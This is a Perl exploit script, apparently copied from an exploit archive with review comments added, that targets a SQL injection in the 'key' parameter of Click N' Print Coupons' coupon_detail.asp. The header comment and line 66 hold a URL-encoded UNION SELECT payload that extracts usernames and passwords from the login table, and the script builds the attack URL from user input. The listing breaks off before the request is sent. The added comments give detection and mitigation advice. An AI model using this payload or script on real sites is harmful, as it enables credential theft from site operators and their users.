1 #!/usr/bin/perl
2 #[Script Name: Click N’ Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
3 #[Coded by : ajann
4 #[Author : ajann
5 #[Contact : :(
6 #[S.Page : http://www.websitedesignsforless.com
7 #[$ : $9.95
8 #[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #..
9 #[.. : ajann,Turkey
10
11 # 2006.01 //coupon_detail.asp?key=−1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%
20where%20id%20like%201
12
13
14 use IO::Socket;
# Usage guard: when the script is started without a command-line argument it
# prints the banner below and exits; none of the later statements run.
# The banner text is a runtime string and is kept exactly as extracted.
15 if(@ARGV < 1){
16 print "
17
[========================================================================
18
[// Click N’ Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
19
[// Usage: exploit.pl [target]
20
[// Example: exploit.pl victim.com
21
[// Example: exploit.pl victim.com
22
[// Vuln&Exp : ajann
23
[========================================================================
24 ";
25 exit();
26 }
# Target set-up. All variables here are undeclared package globals; the visible
# part of the script enables neither `use strict` nor `use warnings`.
27 #Local variables
# First command-line argument is taken as the host name.
28 $server = $ARGV[0];
# Removes every literal "http://" from the argument ("https://" is not matched).
# The /e flag has nothing to evaluate here because the replacement is empty.
29 $server =~ s/(http:\/\/)//eg;
# The scheme is then put back, so the request is always built as plain HTTP.
30 $host = "http://".$server;
31 $port = "80";
# Endpoint and parameter that the header comment names as injectable.
# NOTE(review): for defenders this is the indicator to search web-server logs
# for: requests to coupon_detail.asp whose `key` value is not a plain record
# key. The application-side fix is to validate `key` and pass it to the
# database as a bound parameter instead of concatenating it into the query
# (presumably it is a numeric key; confirm against the application).
32 $file = "/coupon_detail.asp?key=";
33
# Prompts on STDIN for the directory the script is installed under.
34 print "Script <DIR> : ";
35 $dir = <STDIN>;
# chop() removes the last character unconditionally (chomp() would remove only
# a trailing newline), so input that ends without a newline loses a character.
36 chop ($dir);
37
# Any input containing the substring "exit" aborts the run.
38 if ($dir =~ /exit/){
39 print "−− Exploit Failed[You Are Exited] \n";
40 exit();
41 }
42
# The directory must contain at least one "/"; otherwise the script stops.
# The empty true-branch followed by `else` is an inverted test.
43 if ($dir =~ /\//){}
44 else {
45 print "−− Exploit Failed[No DIR] \n";
46 exit();
47 }
48
# Prompts on STDIN for the id of the login row to request.
49 print "User <ID> : ";
50 $ID = <STDIN>;
# chop() drops the last character whatever it is; see chomp() for newline-only.
51 chop ($ID);
Click N Print Coupons V2006.01 key Remote SQL Injection Exploit
ajann
12/30/2006
52
# Any id containing the substring "exit" aborts the run.
53 if ($ID =~ /exit/){
54 print "−− Exploit Failed[You Are Exited] \n";
55 exit();
56 }
57
58 $len=length($ID);
59
# The id must be exactly one character long; any other length stops the script.
# Length is the only property checked in the visible code.
60 if ($len == 1){}
61 else {
62 print "−− Exploit Failed[No User Id] \n";
63 exit();
64 }
65
# Builds the value sent in `key`: a URL-encoded UNION SELECT that names the
# xusername and xpassword columns of the `login` table, with the id read from
# STDIN appended as-is. The impact the page describes is therefore disclosure
# of stored login credentials through the coupon detail page.
# NOTE(review): detection - a `key` parameter containing "union" and "select"
# (URL-encoded or not) in requests to coupon_detail.asp. Mitigation - a
# parameterised query for `key`, a least-privilege database account for the
# web application, and password storage as salted hashes so a leaked column
# is not directly usable.
66 $target = "−1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID;
# Full request URL = scheme and host + script directory + endpoint + payload.
# What is done with it is not visible here; the listing continues on the next page.
67 $target = $host.$dir.$file.$target;
68
69 #Writing data to socket
70 print "+********************************************